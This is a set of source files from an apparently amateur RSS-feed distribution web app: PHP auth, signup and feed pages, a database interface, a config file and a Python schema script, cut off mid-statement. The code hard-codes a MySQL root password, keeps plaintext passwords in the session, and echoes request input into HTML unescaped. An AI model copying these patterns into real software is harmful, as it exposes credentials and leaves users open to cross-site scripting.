"alpha_fraction": 0.6146953701972961, "alphanum_fraction": 0.6146953701972961, "avg_line_length": 28.36842155456543, "blob_id": "c49b5f7b5f82629b35155062b9b0bb45f7320922", "content_id": "62496590f33987d1447beeb32bcd8623940834e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 558, "license_type": "no_license", "max_line_length": 70, "num_lines": 19, "path": "/www/trunk/auth.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('db_init.php');\n\nsession_start();\n\n// XXX replace password for authentication with session id \nif (isset($_SESSION['uid']) && isset($_SESSION['password'])) {\n // find user in database\n $user = User::find('uid', $_SESSION['uid']);\n /* end session if username does not exist or password does not match\n or user is not confirmed by email */\n if ($user === NULL\n || $_SESSION['password'] != $user->password\n || !$user->email_confirmed) {\n unset($_SESSION['uid']);\n unset($_SESSION['password']);\n unset($user);\n }\n}\n" }, { "alpha_fraction": 0.7228915691375732, "alphanum_fraction": 0.7228915691375732, "avg_line_length": 20, "blob_id": "a0cbc66fd121fa2f523c074fdf07e301f7170f62", "content_id": "7ead65861878c576c95275d76da131b7a5122654", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 83, "license_type": "no_license", "max_line_length": 30, "num_lines": 4, "path": "/www/trunk/db_sqlite_test.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('db_sqlite.php');\nSQLiteTest::testAll();\necho 'tests succeeded';" }, { "alpha_fraction": 0.7191066145896912, "alphanum_fraction": 0.72062087059021, "avg_line_length": 41.90255355834961, "blob_id": "447d7a3c0125fcd851642935cd31ee65c2b9afbe", "content_id": "ac1d23494dad02828e4e36821ce84b87bc7e8d5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 18491, "license_type": "no_license", "max_line_length": 79, "num_lines": 431, "path": "/www/trunk/db.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\n\n/* interface iDatabase includes all operations that directly involve the\n underlying database. Most higher level operations involving objects in the\n database should be in their other respective interfaces.\n*/\ninterface iDatabase {\n/* function iDatabase::connect connects to a database using the specified\n configuration variables\n\n $cfg_vars: (array) the configuration variables for the connection to make, \n encoded in key-value pairs which are to be defined by the \n\t implementation (see corresponding documentation)\n\n returns an iDatabase implementing object connected to the specified database\n*/\n public static function connect(array $cfg_vars);\n/* function iDatabase::connectFromIni connects to a database using \n configuration variables read from the specified ini file\n\n $cfg_vars: (string) the filename of an ini file which contains the\n configuration variables for the connection to make, encoded in\n\t ini sections and variables which are to be defined by the\n\t implementation (see corresponding documentation)\n\n returns an iDatabase implementing object connected to the specified database\n*/\n public static function connectFromIni($cfg_file);\n\n/* iDatabase::setAsSiteDefault sets the site default database to the current\n database object. This site default is used in other database object classes\n as the default database to access (see corresponding documentation).\n*/\n public function setAsSiteDefault();\n}\n\n/* interface iStories represents a group of feed stories, and handles all\n operations involving multiple feed stories\n*/\ninterface iStories extends Iterator {\n/* function iStory::get gets the feed storys' information from the database\n\n $storyattrs: (array) an array of strings specifying the desired feed story\n attributes to get, selected from the possible keys in the\n\t following list of key-value pairs returned by this function\n\t 'fid': (integer) the feed storys' id numbers\n\t\t 'id': (integer) an alias for 'fid' attribute\n\t 'title': (string) the feed storys' titles\n\t\t 'content': (string) the feed storys' contents\n\t\t 'url': (string) the feed storys' urls\n\t\t 'timestamp': (integer) the feed storys' timestamps, in seconds\n\t\t since 1970-01-01 00:00:00 UTC\n\t\t 'feed': (iFeed) the feed story's source feeds\n\t\t 'category': (string) the feed storys' categories\n $sortattr: (string) the name of an attribute to sort by, selected from the\n list of possible attributes for MySQLStories::sort (see \n\t corresponding documentation)\n $sortreverse: (boolean) TRUE if the sort should be done in reverse of the\n default direction. See documentation for MySQLStories::sort\n\t\t for default sorting directions for different attributes.\n\n returns an array of arrays, each representing information for a single \n story and containing all requested feed story information that could be\n successfully fetched, in the form described in the description of the\n $storyattrs parameter. The results are sorted by the column and\n direction specified by the $sortattr and $sortreverse parameters if they\n are specified.\n*/\n public function get(array $feedattrs, $sortattr = NULL, \n\t\t $sortreverse = FALSE);\n\n/* function MySQLStories::sort changes the default sorting order and direction\n of the MySQLStories object\n\n $storyattr: (string) the name of the story attribute to sort by, selected\n from the following list of attributes with their default sorting\n\t orders\n\t 'fid': (asc) the feed storys' id numbers\n\t\t 'id': (asc) an alias for 'fid' attribute\n\t 'title': (asc) the feed storys' titles\n\t\t 'content': (asc) the feed storys' contents\n\t\t 'url': (asc) the feed storys' urls\n\t\t 'timestamp': (desc) the feed storys' timestamps\n $reverse: (boolean) TRUE if the sorting direction should be reversed\n*/\n public function sort($storyattr, $reverse = FALSE);\n}\n\n/* interface iStory handles all operations involving a single feed story\n*/\ninterface iStory {\n/* function iStory::find finds a feed by any attribute guaranteed to be unique\n for each feed story\n\n $attr: (string) an attribute name, selected from the following attribute-\n value pairs\n\t 'fid': (integer) the feeds's id number\n\t 'id': (integer) an alias for 'fid' attribute\n $value: (mixed) the value associated with the attribute\n $db: (object) an object representing the database to use, or NULL to use\n the database established as the site default. Note that the type of\n\tobject required for this parameter is implementation-specific\n\n returns an iFeed object representing the matched user, or NULL if none was\n found\n*/\n public static function find($attr, $value, iDatabase $db = NULL);\n\n/* function iStory::get gets the feed story's information from the database\n\n $storyattrs: (array) an array of strings specifying the desired feed story\n attributes to get, selected from the possible keys in the\n\t following list of key-value pairs returned by this function\n\t 'fid': (integer) the feed story's id number\n\t\t 'id': (integer) an alias for 'fid' attribute\n\t 'title': (string) the feed story's title\n\t\t 'content': (string) the feed story's content\n\t\t 'url': (string) the feed story's url\n\t\t 'timestamp': (integer) the feed story's timestamp, in seconds\n\t\t since 1970-01-01 00:00:00 UTC\n\t\t 'feed': (iFeed) the feed story's source feed\n\t\t 'category': (string) the feed story's category\n\n returns an array containing all requested feed story information that could\n be successfully fetched, in the form described in the description of the\n $storyattrs parameter\n*/\n public function get(array $feedattrs);\n}\n\n/* interface iFeeds represents a group of feed sources, and handles all\n operations involving multiple feed sources\n*/\ninterface iFeeds extends Iterator {\n/* function iFeeds::create registers multiple feeds in the database using \n information from $feedinfos or updates their information if they already\n exist\n\n $feedinfos: (array) initial feed information to set, encoded in an array of\n arrays with key-value pairs as described for the $feedinfo\n\t parameter in iFeed::set\n $db: (object) an object representing the database to use, or NULL to use\n the database established as the site default. Note that the type of\n\tobject required for this parameter is implementation-specific\n\n returns an iFeeds object representing the registered or updated feeds\n*/\n public static function create(array $feedinfos, iDatabase $db = NULL);\n\n/* function iFeeds::searchPartial searches for feeds in the database matching\n the given feed information\n\n $attr: (string) the feed attribute to use in the search, selected from the\n following list\n\t 'name': (string) part of the feeds' names\n\t \t 'url': (string) part of the feeds' url\n $db: (object) an object representing the database to use, or NULL to use\n the database established as the site default. Note that the type of\n\tobject required for this parameter is implementation-specific\n\n returns an iFeeds object representing the matched feeds\n*/\n public static function searchPartial($attr, $partial_value,\n\t\t\t\t iDatabase $db = NULL);\n\n/* function iFeeds::merge merges this iFeeds object with another, creating a\n new iFeed object that represents all feeds in both groups\n\n $feeds: (object) the iFeeds implementing object to merge with. Note that the\n two objects to merge must be instances of the same class and objects\n\t from the same database\n\n returns an iFeeds implementing object representing all feeds in both groups\n*/\n public function merge(iFeeds $feeds);\n\n/* function iFeeds::sortByPopularity changes the sorted order of the feeds\n returned by any method in this class. Note that calling this method resets\n the Iterator implemented by this class. */\n public function sortByPopularity();\n}\n\n/* interface iFeed handles all operations involving a single feed source\n*/\ninterface iFeed {\n/* function iFeed::find finds a feed by any attribute guaranteed to be unique\n for each feed\n\n $attr: (string) an attribute name, selected from the following attribute-\n value pairs\n\t 'sid': (integer) the feeds's id number\n\t 'id': (integer) an alias for 'sid' attribute\n\t 'name': (string) the feed's name\n\t 'url': (string) the feed's url\n $value: (mixed) the value associated with the attribute\n $db: (object) an object representing the database to use, or NULL to use\n the database established as the site default. Note that the type of\n\tobject required for this parameter is implementation-specific\n\n returns an iFeed object representing the matched feed, or NULL if none was\n found\n*/\n public static function find($attr, $value, iDatabase $db = NULL);\n\n/* function iFeed::create registers a new feed in the database using \n information from $feedinfo, or finds one by URL if it already exists\n\n $feedinfo: (array) initial feed information to set, encoded in key-value\n pairs as described for the $feedinfo parameter in iFeed::set\n $db: (object) an object representing the database to use, or NULL to use\n the database established as the site default. Note that the type of\n\tobject required for this parameter is implementation-specific\n\n returns an iFeed object representing the newly created/found feed\n*/\n public static function create(array $feedinfo, iDatabase $db = NULL);\n\n/* function iFeed::get gets the feed's information from the database\n\n $feedattrs: (array) an array of strings specifying the desired feed\n attributes to get, selected from the possible keys in the\n\t following list of key-value pairs returned by this function\n\t 'sid': (integer) the feed's id number\n\t\t 'id': (integer) an alias for 'sid' attribute\n\t 'name': (string) the feed's name\n\t\t 'url': (string) the feed's url\n\t\t 'stories': (iStories) an object representing the feed's \n\t\t stories in the database\n\n returns an array containing all requested feed information that could be\n successfully fetched, in the form described in the description of the\n $feedattrs parameter\n*/\n public function get(array $feedattrs);\n\n/* function iFeed::delete deletes the feed and all information associated with\n the feed in the database. Do not use an iFeed object after deleting it.\n*/\n public function delete();\n\n/* function iFeed::getUserCount calculates the number of users subscribed to\n the feed.\n\n returns an integer representing the number of users\n*/\n public function getUserCount();\n}\n\n/* interface iUsers represents a group of users, and handles all database\n operations directly involving multiple users\n*/\ninterface iUsers {\n/* function iUsers::searchAll searches for users in the database matching ALL\n the given user information\n\n $userinfo: (array) the user information to use in the search, encoded in\n the following key-value pairs\n\t 'uid': (integer) the user's id number\n\t\t 'id': (integer) an alias for 'uid' attribute\n\t 'username': (string) the user's username\n\t \t 'email': (string) the user's email\n\t\t 'phone_number': (string) the user's cell phone number\n\t\t 'carrier': (string) the user's cell phone carrier\n\t\t 'send_email': (boolean) TRUE if the user selected email\n\t\t delivery, FALSE otherwise\n\t\t 'send_sms_text': (boolean) TRUE if the user selected SMS text\n\t\t delivery, FALSE otherwise\n\t\t 'send_sms_link': (boolean) TRUE if the user selected SMS link\n\t\t delivery, FALSE otherwise\n\t\t 'feeds': (iFeeds) an object representing the user's \n\t\t subscribed feeds\n $db: (object) an object representing the database to use, or NULL to use\n the database established as the site default. Note that the type of\n\tobject required for this parameter is implementation-specific\n\n returns an iUsers object representing the matched users\n*/\n public static function searchAll(array $userinfo, iDatabase $db = NULL);\n\n/* function iUsers::searchAny searches for users in the database matching ANY\n of the given user information\n\n $userinfo: (array) the user information to use in the search, encoded in\n the following key-value pairs\n\t 'uid': (array of integers) the users' id numbers\n\t\t 'id': (integer) an alias for 'uid' attribute\n\t 'username': (array of strings) the users' usernames\n\t \t 'email': (array of strings) the users' emails\n\t\t 'phone_number': (array of strings) the users' cell phone\n\t\t numbers\n\t\t 'carrier': (array of strings) the users' cell phone carriers\n\t\t 'send_email': (boolean) TRUE if the user selected email\n\t\t delivery, FALSE otherwise\n\t\t 'send_sms_text': (boolean) TRUE if the user selected SMS text\n\t\t delivery, FALSE otherwise\n\t\t 'send_sms_link': (boolean) TRUE if the user selected SMS link\n\t\t delivery, FALSE otherwise\n\t\t 'feeds': (iFeeds) an object representing the users' \n\t\t subscribed feeds\n $db: (object) an object representing the database to use, or NULL to use\n the database established as the site default. Note that the type of\n\tobject required for this parameter is implementation-specific\n\n returns an iUsers object representing the matched users\n*/\n public static function searchAny(array $userinfo, iDatabase $db = NULL);\n\n/* function iUsers::merge merges this iUsers object with another, creating a\n new iUser object that represents all users in both groups\n\n $users: (object) the iUsers implementing object to merge with. Note that the\n two objects to merge must be instances of the same class and objects\n\t from the same database\n\n returns an iUsers implementing object representing all users in both groups\n*/\n public function merge(iUsers $users);\n}\n\n/* interface iUser handles all database operations involving a single user\n*/\ninterface iUser {\n/* function iUser::find finds a user by any attribute guaranteed to be unique\n for each user\n\n $attr: (string) an attribute name, selected from the following attribute-\n value pairs\n\t 'uid': (integer) the user's id number\n\t 'id': (integer) an alias for 'uid' attribute\n 'username': (string) the user's username\n\t 'email': (string) the user's email\n\t 'phone_number': (string) the user's phone number\n $value: (mixed) the value associated with the attribute\n $db: (object) an object representing the database to use, or NULL to use\n the database established as the site default. Note that the type of\n\tobject required for this parameter is implementation-specific\n\n returns an iUser object representing the matched user, or NULL if none was\n found\n*/\n public static function find($attr, $value, iDatabase $db = NULL);\n\n/* function iUser::set sets the user's information in the database\n\n $userinfo: (array) the user information to set, encoded in the following \n key-value pairs\n\t 'username': (string) the desired username\n\t\t'password': (string) the desired password, in plaintext or as a\n\t\t hash\n\t\t'email': (string) the user's email\n\t\t'phone_number': (string) the user's cell phone number, with\n\t\t no spaces or dashes, optionally with a '+' as the first\n\t\t character\n\t 'carrier': (string) the user's cell phone carrier\n\t\t'send_email': (boolean) TRUE if the user selected email \n\t\t delivery, FALSE otherwise\n\t 'send_sms_text': (boolean) TRUE if the user selected SMS text\n\t\t delivery, FALSE otherwise\n\t 'send_sms_link': (boolean) TRUE if the user selected SMS link\n\t\t delivery, FALSE otherwise\n\t\t'feeds': (iFeeds) an object representing the user's desired\n\t\t feed subscriptions\n*/\n public function set(array $userinfo);\n\n/* function iUser::addFeed adds a feed to a user's list of subscribed feeds\n\n $feed: (iFeed) the feed to add to the user\n*/\n public function addFeed(iFeed $feed);\n\n/* function iUser::addFeeds adds feeds to a user's list of subscribed feeds\n\n $feeds: (iFeeds) the set of feeds to add to the user\n*/\n public function addFeeds(iFeeds $feeds);\n\n/* function iUser::get gets the user's information from the database\n\n $userattrs: (array) an array of strings specifying the desired user\n attributes to get, selected from the possible keys in the\n\t following list of key-value pairs returned by this function\n\t 'uid': (integer) the user's id number\n\t\t 'id': (integer) an alias for 'uid' attribute\n\t 'username': (string) the user's username\n\t\t 'password': (string) the user's password (or hash of password)\n\t \t 'email': (string) the user's email\n\t\t 'phone_number': (string) the user's cell phone number\n\t\t 'carrier': (string) the user's cell phone carrier\n\t\t 'send_email': (boolean) TRUE if the user selected email\n\t\t delivery, FALSE otherwise\n\t\t 'send_sms_text': (boolean) TRUE if the user selected SMS text\n\t\t delivery, FALSE otherwise\n\t\t 'send_sms_link': (boolean) TRUE if the user selected SMS link\n\t\t delivery, FALSE otherwise\n\t\t 'feeds': (iFeeds) an object representing the user's \n\t\t subscribed feeds\n\n returns an array containing all requested user information that could be\n successfully fetched, in the form described in the description of the\n $userattrs parameter\n*/\n public function get(array $userattrs);\n\n/* function iUser::create registers a new user in the database using \n information from $userinfo\n\n $userinfo: (array) initial user information to set, encoded in key-value\n pairs as described for the $userinfo parameter in iUser::set\n $db: (object) an object representing the database to use, or NULL to use\n the database established as the site default. Note that the type of\n\tobject required for this parameter is implementation-specific\n\n returns an iUser object representing the newly created user\n*/\n public static function create(array $userinfo, iDatabase $db = NULL);\n\n/* function iUser::delete deletes the user and all information associated with\n the user in the database. Do not use an iUser object after deleting it.\n*/\n public function delete();\n}\n\n/* abstract class DatabaseObject should be the base class for all classes\n representing database objects, if its functionality is needed that is\n*/\nabstract class DatabaseObject {\n /* $site_db is the site default database, set by\n DatabaseObject::setAsSiteDefault */\n protected static $site_db;\n}\n" }, { "alpha_fraction": 0.5399060845375061, "alphanum_fraction": 0.5399060845375061, "avg_line_length": 18.363636016845703, "blob_id": "31a113d408ca41924684037e5ba299c79d3a4146", "content_id": "ab1bfff69dc83a6a49b57d27cb36cd97a52bd057", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 213, "license_type": "no_license", "max_line_length": 44, "num_lines": 11, "path": "/www/trunk/addFeed.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('db_init.php');\nrequire_once('auth.php');\n\nif (isset($_REQUEST['id'])) {\n $feed = Feed::find('id', $_REQUEST['id']);\n if($feed !== NULL) {\n $user->addFeed($feed);\n echo $feed->id;\n }\n}\n" }, { "alpha_fraction": 0.5807812213897705, "alphanum_fraction": 0.5884833931922913, "avg_line_length": 33.295597076416016, "blob_id": "0225f575b73a35a346e4beebcf105ecf2da488cd", "content_id": "4cd881ae711990430fecfca145c96835bb26e330", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 5453, "license_type": "no_license", "max_line_length": 166, "num_lines": 159, "path": "/www/trunk/signup.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\n//include databse functions and objects\n//include('db.php');\n//include('db_sqlite.php');\nob_start();\ninclude_once('db_init.php');\ninclude_once('common.php');\n\n//start user session\nsession_start();\n\n$fieldNumber = 0;\n\n?>\n\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\"\n\t \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html lang=\"EN\" dir=\"ltr\" xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <meta http-equiv=\"content-type\" content=\"text/xml; charset=utf-8\" />\n <title>Sign up</title>\n <link rel=\"stylesheet\" href=\"watercooler.css\" title=\"signup\" />\n <script type=\"text/JavaScript\" src=\"http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js\">\n $(document).ready(function(){$('#userName').focus();});\n </script>\n </head>\n <body>\n <!-- Header -->\n <div id=\"header\">\n <div class=\"corner\">\n\t<a href=\"index.php\">home</a>\n </div>\n <div id=\"logo\">\n\t<a href=\"index.php\"><img src=\"watercooler_logo.png\" alt=\"Welcome to the Watercooler\" /></a>\n </div>\n </div>\n <fieldset id=\"feedback\">\n <?php include_once('verifySignup.php'); ?>\n </fieldset>\n\n <!-- Form -->\n <form action=\"<?php echo $_SERVER['PHP_SELF'];?>\" method=\"post\">\n\n\n <!-- Personal Information Fieldset -->\n <fieldset><legend>Personal Information</legend>\n\n\t<!-- Username -->\n\t <script type=\"text/javascript\">\n\t $('#userName').focus();\n </script>\n\t</div>\n\n\t<!-- Username -->\n\t<div class=\"lineWidth\">\n\t <label class=\"leftCol\" for=\"userName\">Username</label>\n\t <input class=\"middleCol\" id=\"userName\" type=\"text\" name=\"userName\" maxlength=\"25\" value=\"<?php echo $displayUserName; ?>\"/>\n\t <script type=\"text/javascript\">\n\t $('#userName').focus();\n </script>\n\t</div>\n\n\t\n\t<!-- Password -->\n\t<div class=\"lineWidth\">\n\t <label class=\"leftCol\" for=\"pass\">Password</label>\n\t <input class=\"middleCol\" id=\"pass\" type=\"password\" name=\"userPassword\" maxlength=\"10\" />\n\t</div>\n\n\t<!-- Repeat Password -->\n\t<div class=\"lineWidth\"><label class=\"leftCol\" for=\"repeatPass\">Repeat Password</label>\n\t <input class=\"middleCol\" id=\"repeatPass\"type=\"password\" name=\"userRepeatPass\" maxlength=\"10\" />\n\t</div>\n\n\t<!-- Email -->\n\t<div class=\"lineWidth\"><label class=\"leftCol\" for=\"email\">Email</label>\n\t <input class=\"middleCol\" id=\"email\" type=\"text\" name=\"userEmail\" maxlength=\"50\"/ value=\"<?php echo $_REQUEST['userEmail']; ?>\"/>\n\t</div>\n\t\n\t<!-- Phone Number -->\n\t<div class=\"lineWidth\"><label class=\"leftCol\" for=\"cell\">Cell Phone #</label>\n\t <input class=\"middleCol\" id=\"cell\" type=\"text\" name=\"userCell\" maxlength=\"10\" value=\"<?php echo $_REQUEST['userCell']; ?>\"/>\n\t</div>\n\n\t<!-- Carrier -->\n\t<div class=\"lineWidth\">\n\t <label class=\"leftCol\" for=\"carrier\">Carrier</label>\n\t <select style=\"float:left; border: 1px solid navy;\" id=\"carrier\" name=\"userCarrier\">\n\t <option value=\"AT&T\">AT&#38;T</option>\n\t <option <?php if($_REQUEST['userCarrier'] == 'Verizon') echo 'selected'; ?> value=\"Verizon\">Verizon</option>\n\t <option <?php if($_REQUEST['userCarrier'] == 'T-Mobile') echo 'selected'; ?> value=\"T-Mobile\">T-Mobile</option>\n\t <option <?php if($_REQUEST['userCarrier'] == 'Sprint') echo 'selected'; ?> value=\"Sprint\">Sprint</option>\n\t </select>\n\t</div>\n </fieldset>\n\n <!-- Feed Information Fieldset -->\n <fieldset><legend>Feed Information</legend>\n\n\t<!-- Methods of Reception -->\n\t<div class=\"lineWidth\">\n\t <label class=\"leftCol\" for=\"reception\">Methods of Reception</label>\n\t <object>\n\t <input style=\"margin-left:-2.6em;\" type=\"checkbox\" name=\"receive_email\" value=\"yes\" <?php if($_REQUEST['receive_email'] == 'yes') echo 'checked'; ?>/>Email<br />\n\t <input type=\"checkbox\" name=\"receive_sms_text\" value=\"yes\" <?php if($_REQUEST['receive_sms_text'] == 'yes') echo 'checked'; ?>/>SMS (Text)<br />\n\t <input type=\"checkbox\" name=\"receive_sms_link\" value=\"yes\" <?php if($_REQUEST['receive_sms_link'] == 'yes') echo 'checked'; ?>/>SMS (Link)<br />\n\t </object>\n\t</div>\n\t\n\t<!-- Feeds -->\n <div class=\"lineWidth\">\n\t <label for=\"feeds\">Feeds</label>\n\t <object class=\"middleCol\">\n <div id=\"rightCol\">\n\t <?php\n if(isset($_REQUEST['feed']))\n {\n\t foreach($_REQUEST['feed'] as $currentFeed)\n {\n print(\"<input type=\\\"text\\\" name=\\\"feed[]\\\" maxlength=\\\"500\\\" value=\\\"{$currentFeed}\\\"/><br />\");\n }\n }\n else\n {\n for($counter=0; $counter < 3; $counter++)\n print(\"<input type=\\\"text\\\" name=\\\"feed[]\\\" maxlength=\\\"500\\\" /><br />\");\n }\n\t ?>\n </div>\n\t </object>\n\n\t <!--Add More Feeds -->\n\t</div>\n\t<div>\n <button class=\"clickable\" type=\"button\" onclick=\"addFeed()\">Add More Feeds</button>\n\t <input class=\"clickable\" type=\"submit\" name=\"submit\" value=\"Register!\"/>\n\t</div>\n </fieldset>\n </form>\n <script type=\"text/javascript\">\n function addFeed()\n {\n var currentFeeds = document.getElementById('rightCol');\n var newFeeds = document.createElement('input');\n newFeeds.setAttribute('type', 'text');\n newFeeds.setAttribute('name', 'feed[]');\n newFeeds.setAttribute('maxlength', '500');\n currentFeeds.appendChild(newFeeds);\n currentFeeds.appendChild(document.createElement('br'));\n }\n \n function expandFeed()\n {\n var url;\n }\n \n </script>\n </body>\n</html>\n" }, { "alpha_fraction": 0.5642787218093872, "alphanum_fraction": 0.5691854953765869, "avg_line_length": 25.128204345703125, "blob_id": "28ec3e9b136d8a3530e44954461973102e21c7b2", "content_id": "0245c70c0aece081a917d9597d5a166d722b00fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 1019, "license_type": "no_license", "max_line_length": 102, "num_lines": 39, "path": "/www/trunk/getFeeds.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('db_init.php');\nrequire_once('auth.php');\n\nprint('<ul>');\nforeach($user->feeds as $currentFeed)\n {\n // get feed site favicon\n /*$domain = getDomain($currentFeed->url);\n $icon = \"http://\";\n $icon .= $domain;\n $icon .= '/favicon.ico';*/\n // set to default favicon\n $icon = 'feed-icon-14x14.png';\n $currentName = $currentFeed->name;\n if(substr($currentFeed->url,0,strlen($currentName)) == $currentName)\n {\n\t$currentName = getDomain($currentFeed->url);\n }\n print(\"<li class=\\\"feed\\\"><button type=\\\"button\\\" onclick=\\\"getStories('{$currentFeed->id}')\\\">\");\n print(\"<img class=\\\"icon\\\" src=\\\"{$icon}\\\" alt=\\\"{$domain}\\\"></img>\");\n print(\"<div class=\\\"feedName\\\">{$currentName}</div></button></li>\");\n }\nprint('</ul>');\n\nfunction getDomain($url)\n{\n $www_stripped = ereg_replace('www\\.','',$url);\n $domain = parse_url($www_stripped);\n if(!empty($domain[\"host\"]))\n {\n return $domain[\"host\"];\n }\n else\n {\n return $domain[\"path\"];\n }\n\n}\n" }, { "alpha_fraction": 0.6363636255264282, "alphanum_fraction": 0.6363636255264282, "avg_line_length": 13.300000190734863, "blob_id": "3463c881edfcab04cd896a3ce436497c18ccab82", "content_id": "57cb6601558ac84684f6f8b28135ad952b952142", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 143, "license_type": "no_license", "max_line_length": 37, "num_lines": 10, "path": "/www/trunk/logout.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\n\ninclude('common.php');\n\nsession_start();\n\nunset($_SESSION['uid']);\nunset($_SESSION['password']);\n\nheader(\"Location: {$page_uri_base}\");\n" }, { "alpha_fraction": 0.5135135054588318, "alphanum_fraction": 0.5135135054588318, "avg_line_length": 21.846153259277344, "blob_id": "08a1a64025a75993c5366f31f8a1a1210a04a245", "content_id": "03f432ff5f52c8e890b7f07057bcbd1dad6f936a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 296, "license_type": "no_license", "max_line_length": 65, "num_lines": 13, "path": "/www/trunk/dosignup.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nsession_start();\n\nif (isset($_REQUEST['submit'])) {\n var_dump($_REQUEST);\n if ($_REQUEST['username'] != '') {\n $_SESSION['username'] = $_REQUEST['username'];\n print(\"<br />\\n\".$_SESSION['username'].' logged in<br/>');\n print('<a href=\"index.php\">home</a>');\n }\n\n}\n?>" }, { "alpha_fraction": 0.6149068474769592, "alphanum_fraction": 0.6211180090904236, "avg_line_length": 43, "blob_id": "0b03fba8199f7ce52daab5648f9b91a866b20251", "content_id": "febe821a70fd4012786b520b13a603c16aa9bf1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 483, "license_type": "no_license", "max_line_length": 304, "num_lines": 11, "path": "/www/trunk/feedBrowser.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\n\n$db = DB::getSiteDefault();\n$db_feeds = $db->getFeeds();\n$db_feeds->sortByPopularity();\nforeach ($db_feeds as $feed)\n {\n $subscriptions = $feed->getUserCount();\n print(\"<div id=\\\"feed_{$feed->id}\\\"><div style=\\\"float:right;margin-right:0.5em;\\\">{$subscriptions}</div><img onclick=\\\"addFeed('{$feed->id}');\\\" style=\\\"float:left; margin-right:.5em; cursor:pointer;\\\" src=\\\"rss_small.png\\\" alt=\\\"add feed\\\"></img><div class=\\\"feedName\\\">{$feed->name}</div></div>\");\n }\n?>" }, { "alpha_fraction": 0.7748344540596008, "alphanum_fraction": 0.8013244867324829, "avg_line_length": 15.777777671813965, "blob_id": "6a3afe793860796db9352565103a3835da054502", "content_id": "c4f6d1c60564f7ea73901607c5b23fa7e131f0c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 151, "license_type": "no_license", "max_line_length": 32, "num_lines": 9, "path": "/www/trunk/db_def_cfg.ini", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "[MySQLDB]\nusername=root\npassword=adminsql\nhost=watercooler.geogriffin.info\n;port=1234\ndbname=watercooler\n\n[MySQLDB opts]\nPDO::ATTR_PERSISTENT=\"true\"\n" }, { "alpha_fraction": 0.37086236476898193, "alphanum_fraction": 0.38479965925216675, "avg_line_length": 41.32075500488281, "blob_id": "0347c217b1840d66e62de978f5bfb37121e687e6", "content_id": "0ab67951c18b0b220a8fdfa433d172204bfb02e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4592, "license_type": "no_license", "max_line_length": 87, "num_lines": 106, "path": "/email_testing_reset_DB.py", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.6\r\n\r\nimport sys\r\nimport MySQLdb\r\n\r\nconn = MySQLdb.connect (host = \"localhost\",\r\n user = \"root\",\r\n passwd = \"adminsql\",\r\n db = \"watercooler\")\r\ncursor = conn.cursor ()\r\n\r\ncursor.execute (\"DROP TABLE IF EXISTS users;\")\r\ncursor.execute (\"\"\"\r\n CREATE TABLE users\r\n (\r\n uid int(16) NOT NULL UNIQUE auto_increment,\r\n username varchar(32) NOT NULL UNIQUE,\r\n password varchar(32) NOT NULL,\r\n first_name varchar(32),\r\n last_name varchar(32),\r\n phone_number varchar(16) NOT NULL UNIQUE,\r\n email varchar(32) NOT NULL UNIQUE,\r\n status int(4) NOT NULL,\r\n cid int(16) NOT NULL,\r\n PRIMARY KEY (uid),\r\n FOREIGN KEY (cid) REFERENCES carriors\r\n );\r\n \"\"\")\r\ncursor.execute (\"DROP TABLE IF EXISTS receptions;\")\r\ncursor.execute (\"\"\"\r\n CREATE TABLE receptions\r\n (\r\n uid int(16) NOT NULL,\r\n rid int(16) NOT NULL,\r\n FOREIGN KEY (uid) REFERENCES users,\r\n FOREIGN KEY (rid) REFERENCES reception_methods\r\n );\r\n \"\"\")\r\ncursor.execute (\"DROP TABLE IF EXISTS reception_methods;\")\r\ncursor.execute (\"\"\"\r\n CREATE TABLE reception_methods\r\n (\r\n rid int(16) NOT NULL UNIQUE auto_increment,\r\n method_type varchar(32) NOT NULL,\r\n PRIMARY KEY (rid)\r\n );\r\n \"\"\")\r\ncursor.execute (\"DROP TABLE IF EXISTS carriors;\")\r\ncursor.execute (\"\"\"\r\n CREATE TABLE carriors\r\n (\r\n cid int(16) NOT NULL UNIQUE auto_increment,\r\n carrior_name varchar(32) NOT NULL,\r\n PRIMARY KEY (cid)\r\n );\r\n \"\"\")\r\ncursor.execute (\"DROP TABLE IF EXISTS favorites;\")\r\ncursor.execute (\"\"\"\r\n CREATE TABLE favorites\r\n (\r\n uid int(16) NOT NULL,\r\n sid int(16) NOT NULL,\r\n priority int(8) NOT NULL,\r\n FOREIGN KEY (uid) REFERENCES users,\r\n FOREIGN KEY (sid) REFERENCES 